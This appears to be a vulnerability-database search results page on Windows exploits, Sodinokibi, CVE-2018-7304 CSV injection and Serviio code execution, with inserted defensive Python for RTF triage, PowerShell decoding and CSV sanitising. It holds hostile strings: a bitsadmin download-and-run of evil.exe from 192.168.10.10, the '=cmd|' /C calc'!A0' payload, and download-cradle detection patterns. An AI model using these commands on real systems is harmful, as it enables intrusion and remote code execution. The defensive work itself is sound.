Lucene search: 208 matches found

Carbon Black Blog
added 2019/08/16 6:28 p.m., 146 views

CB TAU Threat Intelligence Notification: Sodinokibi Ransomware

Sodinokibi otherwise known as Sodin or REvil is a ransomware variant that has recently been observed evolving its delivery techniques, leveraging fake antivirus software and PowerShell droppers. This malware appears to be related to GandCrab and is likely a result of their operation closing up...

AI score 6.5
Exploits 0

0day.today
added 2019/06/27 12:00 a.m., 761 views

Windows/x86 - bitsadmin Download and Execute Shellcode (210 Bytes)

/ ; Windows/x86 - bitsadmin Download and Execute http://192.168.10.10/evil.exe c:\evil.exe Shellcode 210 Bytes ; Shellcode Title : bitsadmin download and execute ; Shellcode Author : Joseph McDonagh ; Date June 26, 2019 ; Shellcode Length 210 ; However, if the application you are exploiting alrea...

AI score 0.6
Exploits 0

myhack58
added 2018/12/25 12:00 a.m., 2661 views

Analysis of a malicious document exploiting CVE-2017-11882 and CVE-2018-0802 in combination - vulnerability warning - Black Bar Safety Net

Recently an attack sample was intercepted: a Word document with a .doc extension whose actual format is RTF. Analysis of the document's structure shows that it exploits CVE-2017-11882 and CVE-2018-0802 in combination, using an embedded Excel object to trigger the vulnerability. The released ...
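The triage step this write-up starts from (a ".doc" that is really RTF and carries an embedded OLE object), as an added example that is not code from the myhack58 analysis. It checks the container magic instead of trusting the extension and lists the RTF object control words found. The sample bytes and file names are constructed; the object class name and objdata stub are illustrative only.

```python
"""Triage a "Word document" that may really be RTF carrying embedded OLE objects.

Added example (not from the myhack58 write-up): flags files whose extension
says .doc but whose bytes start with the RTF magic, and lists the embedded
object control words an RTF exploit document typically carries. All sample
data below is constructed.
"""
import re
from typing import Dict

# Leading bytes of the containers a ".doc" extension could legitimately hold.
RTF_MAGIC = b"{\\rt"                                # RTF begins "{\rtf"; malware sometimes truncates it
OLE_CF_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary .doc (OLE compound file)
ZIP_MAGIC = b"PK\x03\x04"                           # OOXML .docx

# RTF control words that introduce embedded objects.
OBJECT_RE = re.compile(rb"\\(object|objdata|objclass|objemb|objautlink|objupdate)\b")
# \objclass names the embedded object's class, e.g. "Excel.Sheet.8".
OBJCLASS_RE = re.compile(rb"\\objclass\s*([A-Za-z0-9._]+)")


def detect_container(data: bytes) -> str:
    """Return the real container format based on leading bytes, not the extension."""
    head = data.lstrip()[:8]  # some RTF exploit files pad the start with whitespace
    if head.startswith(RTF_MAGIC):
        return "rtf"
    if head.startswith(OLE_CF_MAGIC):
        return "ole"
    if head.startswith(ZIP_MAGIC):
        return "ooxml"
    return "unknown"


def triage_document(filename: str, data: bytes) -> Dict[str, object]:
    """Report container/extension mismatch and embedded-object markers."""
    container = detect_container(data)
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    result: Dict[str, object] = {
        "container": container,
        "extension_mismatch": ext == "doc" and container == "rtf",
        "object_control_words": [],
        "object_classes": [],
        "suspicious": False,
    }
    if container == "rtf":
        words = sorted({m.group(1).decode() for m in OBJECT_RE.finditer(data)})
        classes = [m.group(1).decode() for m in OBJCLASS_RE.finditer(data)]
        result["object_control_words"] = words
        result["object_classes"] = classes
        # An RTF posing as .doc that embeds an OLE object is the pattern in the
        # write-up; hand it to deeper analysis rather than opening it.
        result["suspicious"] = bool(result["extension_mismatch"]) and "objdata" in words
    return result


# Constructed sample: a minimal RTF skeleton with an embedded Excel object stub
# (the objdata hex is an OLE1 header followed by the class name, not a real exploit).
SAMPLE_RTF_DOC = (
    b"{\\rtf1\\ansi{\\object\\objemb\\objw100\\objh100"
    b"{\\*\\objclass Excel.Sheet.8}"
    b"{\\*\\objdata 01050000020000000e000000457863656c2e53686565742e3800}}"
    b"\\par Invoice attached.}"
)
# Constructed benign comparison: a legacy binary .doc header with no RTF content.
SAMPLE_OLE_DOC = OLE_CF_MAGIC + b"\x00" * 64

if __name__ == "__main__":
    for name, blob in [("invoice.doc", SAMPLE_RTF_DOC), ("memo.doc", SAMPLE_OLE_DOC)]:
        print(name, triage_document(name, blob))
```

The magic check is deliberately applied after stripping leading whitespace, because RTF exploit documents often pad or mangle the header while Word still opens them. A positive result is a triage signal, not proof of exploitation; the objdata payload still has to be extracted and examined.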

CVSS 9.3, AI score 8.4, EPSS 0.99945
Exploits 36

FireEye
added 2018/11/20 5:30 p.m., 20 views

Cmd and Conquer: De-DOSfuscation with flare-qdb

When Daniel Bohannon released his excellent DOSfuscation paper, I was fascinated to see how tricks I used as a systems engineer could help attackers evade detection. I didn’t have much to contribute to this conversation until I had to analyze a hideously obfuscated batch file as part of my job on...

AI score 7.1
Exploits 0, References 10

Carbon Black Blog
added 2018/08/27 4:42 p.m., 95 views

Threat Analysis: Recent Attack Technique Leveraging cmd.exe and PowerShell Demonstrates How Attackers Are Using Trusted Microsoft Applications for Malicious Behavior

An attack leveraging cmd.exe and PowerShell was recently investigated by Cb ThreatSight analysts. Our initial investigation discovered that a batch file was executed on the targeted system. This batch file then invoked PowerShell with a base64 encoded command. Decoding the command revealed a seri...
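The chain in this entry, a batch file that launches PowerShell with a base64-encoded command, together with the cmd.exe obfuscation the FireEye DOSfuscation entry above deals with and the bitsadmin download-and-execute shellcode entry further up, as one added example that is not code from any of those posts. It resolves two common cmd.exe tricks (caret escapes and %VAR:~start,len% substring expansion), finds the -EncodedCommand argument, decodes it from base64/UTF-16LE, and reports indicators. The command lines, environment values and payload are constructed; the indicator list is an assumption for illustration.

```python
"""Un-DOSfuscate a cmd.exe command line and decode the PowerShell it launches.

Added example, not code from the FireEye or Carbon Black posts. The sample
command lines, environment and payload are constructed.
"""
import base64
import re
from typing import Dict, Optional

# cmd's %VAR%, %VAR:~start% and %VAR:~start,len% forms (start/len may be negative).
SUBSTR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
_PREFIXES = ["ec"] + ["encodedcommand"[:i] for i in range(14, 0, -1)]
ENC_FLAG_RE = re.compile(r"-(?:" + "|".join(_PREFIXES) + r")\s+([A-Za-z0-9+/=]{8,})", re.I)
# Assumed indicator set; extend from your own telemetry.
INDICATOR_RES = {
    "powershell_from_cmd": re.compile(r"\bcmd(?:\.exe)?\s+/c\b.*\bpowershell\b", re.I),
    "encoded_command": ENC_FLAG_RE,
    "bitsadmin_download": re.compile(r"\bbitsadmin\b.*/(?:transfer|addfile)\b", re.I),
    "download_cradle": re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biex\b", re.I),
}


def _substring(value: str, start: int, length: Optional[int]) -> str:
    """cmd.exe substring semantics: negative start counts from the end,
    negative length drops that many characters from the end."""
    n = len(value)
    begin = start if start >= 0 else max(n + start, 0)
    if length is None:
        return value[begin:]
    return value[begin:begin + length] if length >= 0 else value[begin:n + length]


def expand_variables(cmd: str, env: Dict[str, str]) -> str:
    """Expand %VAR% and %VAR:~s,l% case-insensitively; unknown variables are
    left untouched, as cmd.exe does on an interactive command line."""
    upper_env = {k.upper(): v for k, v in env.items()}

    def repl(m: "re.Match[str]") -> str:
        name, start, length = m.group(1), m.group(2), m.group(3)
        if name.upper() not in upper_env:
            return m.group(0)
        value = upper_env[name.upper()]
        if start is None:
            return value
        return _substring(value, int(start), int(length) if length is not None else None)

    return SUBSTR_RE.sub(repl, cmd)


def strip_carets(cmd: str) -> str:
    """Remove cmd.exe's ^ escape character: ^x becomes x, ^^ becomes ^."""
    out, i = [], 0
    while i < len(cmd):
        if cmd[i] == "^" and i + 1 < len(cmd):
            out.append(cmd[i + 1])
            i += 2
        else:
            out.append(cmd[i])
            i += 1
    return "".join(out)


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_FLAG_RE.search(cmd)
    if not m:
        return None
    payload = m.group(1) + "=" * (-len(m.group(1)) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(payload).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmd: str, env: Dict[str, str]) -> Dict[str, object]:
    """Deobfuscate, decode, and collect indicators over launcher plus payload."""
    clean = strip_carets(expand_variables(cmd, env))  # cmd expands %vars% before carets
    decoded = decode_encoded_command(clean)
    text = clean + "\n" + (decoded or "")
    hits = sorted(name for name, rx in INDICATOR_RES.items() if rx.search(text))
    return {"deobfuscated": clean, "decoded_powershell": decoded, "indicators": hits}


# Constructed environment (values mirror a default Windows install).
SAMPLE_ENV = {"COMSPEC": r"C:\Windows\system32\cmd.exe", "TEMP": r"C:\Users\Public\Temp"}
# Constructed payload: PowerShell that uses bitsadmin to fetch and run a file.
SAMPLE_SCRIPT = r"bitsadmin /transfer dl /download http://192.168.10.10/evil.exe c:\evil.exe; & c:\evil.exe"
SAMPLE_B64 = base64.b64encode(SAMPLE_SCRIPT.encode("utf-16-le")).decode()
# Constructed launcher: carets hide "powershell"; "-enc" is assembled from
# characters 15, 5 and 20 of %COMSPEC% (e, n, c).
SAMPLE_OBFUSCATED = ("cmd.exe /c ^p^o^w^e^r^s^h^e^l^l "
                     "-%COMSPEC:~15,1%%COMSPEC:~5,1%%COMSPEC:~20,1% " + SAMPLE_B64)
SAMPLE_BENIGN = "cmd.exe /c dir %TEMP%"

if __name__ == "__main__":
    for line in (SAMPLE_OBFUSCATED, SAMPLE_BENIGN):
        print(analyze_command_line(line, SAMPLE_ENV))
```

Feed it process-creation command lines (Sysmon event 1 or EDR telemetry) and the environment of the host; substring expansion only resolves against the variables you supply, so unknown names stay visible in the output for manual follow-up. Inside a batch file, as opposed to the command line, an undefined variable expands to nothing, and %% is a literal percent sign; handle those separately if you process .bat contents rather than captured command lines.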

Exploits 0

OSV
added 2018/02/21 8:29 p.m., 16 views

CVE-2018-7304

Tiki 17.1 does not validate user input for special characters; consequently, a CSV Injection attack can open a CMD.EXE or Calculator window on the victim machine to perform malicious activity, as demonstrated by an "=cmd|' /C calc'!A0" payload during User Creation...

CVSS 8.8, AI score 7.4
Exploits 0, References 1

Cvelist
added 2018/02/21 8:00 p.m., 21 views

CVE-2018-7304

Tiki 17.1 does not validate user input for special characters; consequently, a CSV Injection attack can open a CMD.EXE or Calculator window on the victim machine to perform malicious activity, as demonstrated by an "=cmd|' /C calc'!A0" payload during User Creation...

AI score 8.9, EPSS 0.01269
Exploits 1, References 1

CVE
added 2018/02/21 8:00 p.m., 54 views

CVE-2018-7304

CVE-2018-7304 affects Tiki Wiki CMS Groupware (Tiki) version 17.1. The vulnerability arises because the application does not validate user input containing special characters in CSV fields, enabling CSV Injection that can trigger commands on the victim’s machine (for example, an input payload lik...
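The CSV injection the three CVE-2018-7304 entries describe, as an added example that is not Tiki's code: why the "=cmd|' /C calc'!A0" payload is evaluated, how to audit an existing export for such cells, and how a safe writer neutralises them. The user-creation rows are constructed.

```python
"""CSV (formula) injection: detect it in exports and neutralise it on write.

Added example, not Tiki's code. A cell stored verbatim as "=cmd|' /C calc'!A0"
becomes a formula when an administrator opens the export in a spreadsheet:
the leading "=" triggers evaluation and the "|" part is a DDE call that
launches cmd.exe. The rows below are constructed.
"""
import csv
import io
import re
from typing import List, Tuple

# Characters that make a spreadsheet evaluate the cell instead of displaying it.
FORMULA_TRIGGERS = ("=", "+", "-", "@")
# A leading tab or carriage return can also smuggle a formula through importers.
LEADING_CONTROL = ("\t", "\r")
# Plain numbers legitimately start with "-"; do not mangle them.
NUMBER_RE = re.compile(r"-?\d+(?:\.\d+)?")


def is_formula_injection(value: str) -> bool:
    """True when a spreadsheet would evaluate this cell rather than show it."""
    if NUMBER_RE.fullmatch(value):
        return False
    return value[:1] in FORMULA_TRIGGERS + LEADING_CONTROL


def sanitize_cell(value: str) -> str:
    """Prefix a dangerous cell with a single quote so it is stored as text
    (the OWASP-recommended neutralisation); other cells pass through unchanged."""
    return "'" + value if is_formula_injection(value) else value


def write_csv(rows: List[List[str]]) -> str:
    """Serialise rows with every cell sanitised and quoted."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


def audit_csv(text: str) -> List[Tuple[int, int, str]]:
    """Scan an existing export: (row, column, cell) for every cell that would be
    evaluated. Useful to check whether an export was already poisoned."""
    findings = []
    for r, row in enumerate(csv.reader(io.StringIO(text))):
        for c, cell in enumerate(row):
            if is_formula_injection(cell):
                findings.append((r, c, cell))
    return findings


# Constructed user-creation rows; the last one carries the CVE's payload.
SAMPLE_ROWS = [
    ["username", "realname", "email"],
    ["alice", "Alice Example", "alice@example.com"],
    ["mallory", "=cmd|' /C calc'!A0", "mallory@example.com"],
]
# The same data as a naive application would export it (no escaping).
UNSAFE_EXPORT = (
    "username,realname,email\n"
    "alice,Alice Example,alice@example.com\n"
    "mallory,=cmd|' /C calc'!A0,mallory@example.com\n"
)

if __name__ == "__main__":
    print("poisoned cells in naive export:", audit_csv(UNSAFE_EXPORT))
    safe = write_csv(SAMPLE_ROWS)
    print(safe)
    print("poisoned cells after sanitising:", audit_csv(safe))
```

Quoting alone does not help: spreadsheets evaluate a quoted cell just the same, which is why the single-quote prefix is needed. The prefix is visible when the file is re-imported as text, so columns that are genuinely numeric should be validated as numbers before export rather than passed through this path. Rejecting such characters at the point of user creation, which is what the CVE says Tiki 17.1 fails to do, remains the primary fix; output encoding is defence in depth.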

CVSS 8.8, AI score 8.8, EPSS 0.01269
Exploits 1, References 1, Affected Software 1

Exploit DB
added 2018/01/23 12:00 a.m., 36 views

HP Connected Backup 8.6/8.8.6 - Local Privilege Escalation

Tested on HP Connected Backup version 8.8.2.0 on Windows 7 x64 import os import sys import time import requests from bs4 import BeautifulSoup def sendrequestbody: url="http://localhost:16386/" headers = "Content-Type": "text/xml; charset=utf-8", 'SOAPAction': '""', "Set-Cookie":...

AI score 7.4
Exploits 0

seebug.org
added 2017/12/11 12:00 a.m., 58 views

Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution

Summary Serviio is a free media server. It allows you to stream your media files music, video or images to renderer devices e.g. a TV set, Bluray player, games console or mobile phone on your connected home network. Description The version of Serviio installed on the remote Windows host is affect...

AI score 8.2
Exploits 0

0day.today
added 2017/08/22 12:00 a.m., 107 views

Windows Escalate UAC Protection Bypass (Via COM Handler Hijack) Exploit

This Metasploit module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in...

AI score 6.8
Exploits 0

Metasploit
added 2017/07/31 4:26 a.m., 61 views

Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)

This module will bypass Windows UAC by creating COM handler registry entries in the HKCU hive. When certain high integrity processes are loaded, these registry entries are referenced resulting in the process loading user-controlled DLLs. These DLLs contain the payloads that result in elevated...

AI score 7.1
Exploits 0

myhack58
added 2017/07/24 12:00 a.m., 55 views

Source engine game remote code execution vulnerability analysis - vulnerability warning - Black Bar Safety Net

Valve's Source SDK contains a buffer overflow that allows arbitrary code execution on both the client and the server. The vulnerability is triggered when a player is shot and killed, which causes the game to load a specific ragdoll model. In June 2017, multiple Source games ...

AI score 0.4
Exploits 0

Packet Storm
added 2017/07/17 12:00 a.m., 22 views

FTPGetter 5.89.0.85 Buffer Overflow

#!/usr/bin/python Exploit Title: FTPGetter 5.89.0.85 Remote SEH Buffer Overflow Date: 07/14/2017 Exploit Author: Paul Purcell Contact: ptpxploit at gmail Vendor Homepage: https://www.ftpgetter.com/ Vulnerable Version Download: Available for 30 days here: https://ufile.io/2celn I can upload again...

AI score 0.8
Exploits 0

0day.today
added 2017/05/17 12:00 a.m., 26 views

Serviio Media Server checkStreamUrl Command Execution Exploit

This Metasploit module exploits an unauthenticated remote command execution vulnerability in the console component of Serviio Media Server versions 1.4 to 1.8 on Windows operating systems. The console service on port 23423 by default exposes a REST API which does not require authentication...

AI score 7.5
Exploits 0

Exploit DB
added 2017/05/17 12:00 a.m., 25 views

Serviio Media Server - checkStreamUrl Command Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule /Restlet-Framework/ include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager def initializeinfo = superupdateinfoinfo, 'Name' =...

AI score 7.4
Exploits 0

Metasploit
added 2017/05/05 7:54 a.m., 19 views

Serviio Media Server checkStreamUrl Command Execution

This module exploits an unauthenticated remote command execution vulnerability in the console component of Serviio Media Server versions 1.4 to 1.8 on Windows operating systems. The console service on port 23423 by default exposes a REST API which does not require authentication. The 'actio...

AI score 1.3
Exploits 0

0day.today
added 2017/05/04 12:00 a.m., 54 views

Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution Exploit

Serviio PRO DLNA Media Streaming Server version 1.8.0.0 PRO, 1.7.1, 1.7.0, and 1.6.1 suffers from a REST API arbitrary code execution vulnerability. #!/usr/bin/env python Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution Vendor: Petr Nejedly | Six Lines Ltd Product web...

AI score 7.9
Exploits 0

Exploit DB
added 2017/05/03 12:00 a.m., 76 views

Serviio PRO 1.8 DLNA Media Streaming Server - REST API Arbitrary Code Execution

#!/usr/bin/env python Serviio PRO 1.8 DLNA Media Streaming Server REST API Arbitrary Code Execution Vendor: Petr Nejedly | Six Lines Ltd Product web page: http://www.serviio.org Affected version: 1.8.0.0 PRO, 1.7.1, 1.7.0, 1.6.1 Summary: Serviio is a free media server. It allows you to stream your...

AI score 7.4
Exploits 0

0day.today
added 2017/04/18 12:00 a.m., 34 views

Microsoft Windows taskschd.msc Privilege Escalation Vulnerability

Microsoft Windows taskschd.msc local SYSTEM privilege escalation exploit. Microsoft Windows 'taskschd.msc' Local SYSTEM Privilege Escalation Todor Donev https://www.ethical-hacker.org/ https://www.facebook.com/ethicalhackerorg Disclaimer: This or previous programs is for Educational purpose ONLY...

AI score 7.1
Exploits 0